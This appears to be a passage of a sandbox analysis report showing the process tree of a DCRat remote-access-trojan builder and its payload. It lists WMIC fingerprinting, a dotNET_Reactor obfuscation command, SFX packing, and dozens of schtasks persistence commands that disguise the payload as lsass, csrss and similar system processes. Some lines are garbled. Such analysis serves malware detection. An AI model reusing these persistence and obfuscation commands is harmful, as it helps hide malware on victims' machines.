llIllIlIlllIlIIlIlIlIIllIlIIIIIllIIlIIlIIlIIllIIIlIIllIlIIIIlIlIIlIIlIllIIlIIlIlIl.jar;lib\llIlIIIIlIlIlllllIlIIllllIIIlIlIllllIIllllIlllIIlllllIIlIlllIIIIIIlIIllIIIlIlIlllIlIIIlIIIIIllIlllIlllIIllIIllIlIlIIlllI.jar;lib\llIlIlIIIllllIIIllllllllllIllIlIlllIIlllIIlllIIllIIllllIlllIIIIIllllIIlllIIllIIIIlIlIlIlIIIlIIIlIlIlIlIIlllIIlllIlIlIlII.jar;lib\lllIIlIlIIlIIllllIIllllIIlIllllIIIlIllllIIllIIIlllIIIIIIlIIlllIIllIllIIlllIlIIlIlIlllIIlllIlllIlIIlIIIllIlllIIIlIIIIIlll.jar;lib\lllIlIIIIIlIllIlIlIIllIlIIIlIIllIllllIIIIIllIlllIllIIllIIllIllIllIIlIlllllIIlIllIllIIlIIlIIIllIlIlIIlIIIIIIIllIIlllIllIl.jar;lib\llllIlIIIIIllllIlIIIlIllIlIIIllllIIIllIllllIIlllIlIIIlllIIlIlIlllIIlIIIIlIIIIlllIIlIIlIlIIIIIIIIllllIllIlIIIlIllIlIlIIll.jar;lib\llllIlIIlIllllIlIlIIIlIIIlIllIlIIIIlIlIIlIlIIIIllIIlIIllIIIllllIlIllIlllllIIIIIIIIllIllIlIlllllllIllIIIllllIIllIIlIllIll.jar" org.develnext.jphp.ext.javafx.FXLauncher
      4⤵
      Modifies registry class
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      PID:1756
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c C:\Windows\System32\wbem\wmic.exe baseboard get Manufac ��
        5⤵
        
        PID:4988
      - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\wmic.exe baseboard get Manufac
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3352
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c USERPR ��
        5⤵
        
        PID:404
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c C:\Windows\System32\wbem\wmic.exe baseboap��3��
        5⤵
        
        PID:4848
      - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\wmic.exe baseboap��3��
        6⤵
        
        PID:7264
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c C:\Windows\System32\wbem\wmic.exe CPU get Proc ��8�Y
        5⤵
        
        PID:5416
      - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\wmic.exe CPU get Proc
        6⤵
        
        PID:5468
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c C:\Windows\System32\wbem\wmic.exe diskdrive where "'Index*'L��] ��\�X[�[X�\\"
        5⤵
        
        PID:3540
      - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\wmic.exe diskdrive where "'Index*'L��] ��\�X[�[X�\\"
        6⤵
        
        PID:7268
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c C:\Windows\System32\wbem\wmic.exe Path Win32_VideoConp��3�\��]�Y[��\�
        5⤵
        
        PID:3596
      - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\wmic.exe Path Win32_VideoConp��3�\��]�Y[��\�
        6⤵
        
        PID:3092
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c C:\Windows\System32\wbem\wmic.exe diskdrive where "'Il*'L��] ��^"
        5⤵
        
        PID:6220
      - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\wmic.exe diskdrive where "'Il*'L��] ��^"
        6⤵
        
        PID:3160
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c cd "C:\Users\Admin\Downloads\dcrat\data\" > nul & "DCRCC.exe" "C:\Users\Admin\Downloads\dcrat/data/9bpLETWpDfi.bin" "C:\Users\Admin\Downloads\dcrat\data\a835b16c9d19a42355de59d4841752e0.dll" library
        5⤵
        
        PID:6660
      - C:\Users\Admin\Downloads\dcrat\data\DCRCC.exe
        
        "DCRCC.exe" "C:\Users\Admin\Downloads\dcrat/data/9bpLETWpDfi.bin" "C:\Users\Admin\Downloads\dcrat\data\a835b16c9d19a42355de59d4841752e0.dll" library
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1884
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lqhyqbef\lqhyqbef.cmdline"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5280
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9ECF.tmp" "c:\Users\Admin\Downloads\dcrat\data\CSC309CC7366B1244C3AD4010C5A04574C5.TMP"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5188
    - - C:\Windows\SYSTEM32\cscript.exe
        
        cscript "C:\Users\Admin\Downloads\dcrat/data/enc.vbe" "C:\Users\Admin\Downloads\dcrat/data/XtpSHpC7f961Cu.vbs"
        5⤵
        
        PID:2024
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c cd "C:\Users\Admin\Downloads\dcrat\data\" > nul & "DCRAC.exe" "C:\Users\Admin\Downloads\dcrat\data\tempfile.json" "C:\Users\Admin\Downloads\dcrat\data\jVCNun9.exe" "C:\Users\Admin\Downloads\dcrat/data/iUCPbiDL25rEY3ubJE1.bin" "C:\Users\Admin\Downloads\dcrat/data/iUCPbiDL25rEY3ubJE2.bin" "C:\Users\Admin\Downloads\dcrat/data/iUCPbiDL25rEY3ubJE3.bin"
        5⤵
        
        PID:1124
      - C:\Users\Admin\Downloads\dcrat\data\DCRAC.exe
        
        "DCRAC.exe" "C:\Users\Admin\Downloads\dcrat\data\tempfile.json" "C:\Users\Admin\Downloads\dcrat\data\jVCNun9.exe" "C:\Users\Admin\Downloads\dcrat/data/iUCPbiDL25rEY3ubJE1.bin" "C:\Users\Admin\Downloads\dcrat/data/iUCPbiDL25rEY3ubJE2.bin" "C:\Users\Admin\Downloads\dcrat/data/iUCPbiDL25rEY3ubJE3.bin"
        6⤵
        
        PID:2976
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c cd "C:\Users\Admin\Downloads\dcrat\data\" > nul & "dotNET_Reactor.Console.exe" -file "C:\Users\Admin\Downloads\dcrat\data\jVCNun9.exe" -targetfile "C:\Users\Admin\Downloads\dcrat\data\blockwinref.exe" -control_flow_obfuscation 1 -flow_level 9 -resourceencryption 1 -stringencryption 1 -suppressildasm 1 -all_params 1 -obfuscate_public_types 1 -exception_handling 0 -internalization 1
        5⤵
        
        PID:128
      - C:\Users\Admin\Downloads\dcrat\data\dotNET_Reactor.Console.exe
        
        "dotNET_Reactor.Console.exe" -file "C:\Users\Admin\Downloads\dcrat\data\jVCNun9.exe" -targetfile "C:\Users\Admin\Downloads\dcrat\data\blockwinref.exe" -control_flow_obfuscation 1 -flow_level 9 -resourceencryption 1 -stringencryption 1 -suppressildasm 1 -all_params 1 -obfuscate_public_types 1 -exception_handling 0 -internalization 1
        6⤵
        
        PID:4772
        
        C:\Users\Admin\Downloads\dcrat\data\dotNET_Reactor.exe
        
        "C:\Users\Admin\Downloads\dcrat\data\dotNET_Reactor.exe" "-file" "C:\Users\Admin\Downloads\dcrat\data\jVCNun9.exe" "-targetfile" "C:\Users\Admin\Downloads\dcrat\data\blockwinref.exe" "-control_flow_obfuscation" "1" "-flow_level" "9" "-resourceencryption" "1" "-stringencryption" "1" "-suppressildasm" "1" "-all_params" "1" "-obfuscate_public_types" "1" "-exception_handling" "0" "-internalization" "1"
        7⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:6432
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s1bqvszg\s1bqvszg.cmdline"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5972
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB748.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFE428BF3E7FC47929BF4A1E8E373CB29.TMP"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:7304
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c cd "C:\Users\Admin\Downloads\dcrat\data\" > nul & "Rar.exe" a -m0 -sfx -z"C:\Users\Admin\Downloads\dcrat\data\data.conf" "DhAVIntwziUrVMzuhrJ1G222QMWZs" "dzIBKjLNvS.bat" "blockwinref.exe" "XtpSHpC7f961Cu.vbe" & wRar.exe s -iadm "DhAVIntwziUrVMzuhrJ1G222QMWZs.exe" & echo Done!
        5⤵
        
        PID:1264
      - C:\Users\Admin\Downloads\dcrat\data\Rar.exe
        
        "Rar.exe" a -m0 -sfx -z"C:\Users\Admin\Downloads\dcrat\data\data.conf" "DhAVIntwziUrVMzuhrJ1G222QMWZs" "dzIBKjLNvS.bat" "blockwinref.exe" "XtpSHpC7f961Cu.vbe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4944
      - C:\Users\Admin\Downloads\dcrat\data\wRar.exe
        
        wRar.exe s -iadm "DhAVIntwziUrVMzuhrJ1G222QMWZs.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3104
- C:\Users\Admin\Downloads\dcrat\php\php.exe
  php -S 127.0.0.1:8000 -t ..\server
  2⤵
  PID:7196

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k DriverDisplayKeyboard -s DriverDisplayKeyboard
1⤵
- Loads dropped DLL
PID:6548

C:\Users\Admin\Desktop\DCRatBuild.exe
"C:\Users\Admin\Desktop\DCRatBuild.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6624
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\surrogatecontainerWebreviewSvc\XtpSHpC7f961Cu.vbe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\surrogatecontainerWebreviewSvc\dzIBKjLNvS.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7324
  - - C:\surrogatecontainerWebreviewSvc\blockwinref.exe
      "C:\surrogatecontainerWebreviewSvc\blockwinref.exe"
      4⤵
      Modifies WinLogon for persistence
      Executes dropped EXE
      Adds Run key to start application
      Drops file in Program Files directory
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      PID:2028
    - - C:\surrogatecontainerWebreviewSvc\dwm.exe
        
        "C:\surrogatecontainerWebreviewSvc\dwm.exe"
        5⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:7328
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dFeEewS5jL.bat" "
        6⤵
        
        PID:2472
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:6340

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\surrogatecontainerWebreviewSvc\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1156

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\surrogatecontainerWebreviewSvc\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4608

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\surrogatecontainerWebreviewSvc\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3408

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Sidebar\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6968

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5800

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Sidebar\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2224

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "blockwinrefb" /sc MINUTE /mo 10 /tr "'C:\Windows\IdentityCRL\blockwinref.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6760

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "blockwinref" /sc ONLOGON /tr "'C:\Windows\IdentityCRL\blockwinref.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "blockwinrefb" /sc MINUTE /mo 14 /tr "'C:\Windows\IdentityCRL\blockwinref.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1356

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 8 /tr "'C:\Program Files\dotnet\unsecapp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Program Files\dotnet\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 5 /tr "'C:\Program Files\dotnet\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7152

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Searches\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2960

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Admin\Searches\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4612

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\Searches\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7952

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Windows\bcastdvr\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7476

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\bcastdvr\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Windows\bcastdvr\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6696

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\surrogatecontainerWebreviewSvc\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4124

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\surrogatecontainerWebreviewSvc\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6840

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\surrogatecontainerWebreviewSvc\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3396

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Photo Viewer\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5000

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Photo Viewer\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:704

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\surrogatecontainerWebreviewSvc\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\surrogatecontainerWebreviewSvc\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7140

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\surrogatecontainerWebreviewSvc\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:8008

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\surrogatecontainerWebreviewSvc\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2156

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\surrogatecontainerWebreviewSvc\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5416

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\surrogatecontainerWebreviewSvc\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4452

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Google\Update\1.3.36.371\backgroundTaskHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7680

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Update\1.3.36.371\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3836

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Google\Update\1.3.36.371\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7256

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\Windows\Offline Web Pages\backgroundTaskHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2720

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:892

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 12 /tr "'C:\Windows\Offline Web Pages\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5696

C:\Users\Admin\Desktop\DCRatBuild.exe
"C:\Users\Admin\Desktop\DCRatBuild.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1992
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\surrogatecontainerWebreviewSvc\XtpSHpC7f961Cu.vbe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5572
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\surrogatecontainerWebreviewSvc\dzIBKjLNvS.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7956
  - - C:\surrogatecontainerWebreviewSvc\blockwinref.exe
      "C:\surrogatecontainerWebreviewSvc\blockwinref.exe"
      4⤵
      Executes dropped EXE
      PID:6332

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:2896
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of SendNotifyMessage
  PID:3368
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1820 -parentBuildID 20240401114208 -prefsHandle 1672 -prefMapHandle 1664 -prefsLen 27676 -prefMapSize 245341 -appDir "C:\Program Files\Mozilla Firefox\browser" - {891f313a-4629-4b3f-825b-f91f66bebefa} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" gpu
    3⤵
    PID:7292
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2180 -parentBuildID 20240401114208 -prefsHandle 2172 -prefMapHandle 2168 -prefsLen 27676 -prefMapSize 245341 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb3ebe76-0c38-4c0c-82b6-74518a13e9ef} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" socket
    3⤵
    - Checks processor information in registry
    PID:3240
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2568 -childID 1 -isForBrowser -prefsHandle 3024 -prefMapHandle 3092 -prefsLen 28175 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {67f9d207-8bcb-4c22-bf32-784d1dc48ed0} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:2384
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2408 -childID 2 -isForBrowser -prefsHandle 2748 -prefMapHandle 3464 -prefsLen 33408 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {24f01eed-5207-4814-a39d-30df2b70ce54} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:7420
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4388 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4472 -prefMapHandle 4468 -prefsLen 33408 -prefMapSize 245341 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {41ad66ea-8db5-46c0-8957-2540f06ef3a6} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" utility
    3⤵
    - Checks processor information in registry
    PID:5544
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4452 -childID 3 -isForBrowser -prefsHandle 5108 -prefMapHandle 5152 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c12f8d19-6c71-4ef1-a3ba-cb6ff6916d72} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:6440
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5292 -childID 4 -isForBrowser -prefsHandle 5300 -prefMapHandle 5304 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf0a5732-dfc8-48e6-84bd-78013c0ada3f} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:2660
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5520 -childID 5 -isForBrowser -prefsHandle 5464 -prefMapHandle 5460 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {18b32169-4d98-4d74-b69b-5a7b9d497859} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:6072
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4764 -childID 6 -isForBrowser -prefsHandle 6044 -prefMapHandle 6048 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {041fbe5a-b890-4829-9e24-a956c2a6688c} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:920
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6148 -childID 7 -isForBrowser -prefsHandle 6156 -prefMapHandle 6160 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2998a693-ba0b-48dc-becf-284c1f0a47de} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:6480
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6416 -childID 8 -isForBrowser -prefsHandle 6200 -prefMapHandle 6204 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {05a1cab6-579a-4a8d-8bb5-d8c820017b70} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:1904
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5888 -childID 9 -isForBrowser -prefsHandle 2480 -prefMapHandle 5372 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2e77be6b-7b4b-4211-8bef-e3b925674ad1} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:6008
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7480 -childID 10 -isForBrowser -prefsHandle 5296 -prefMapHandle 5176 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7bc9cc8f-c197-4073-992f-bc16118f3422} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:6128
- - C:\Program Files\Mozilla Firefox\firefox.exe
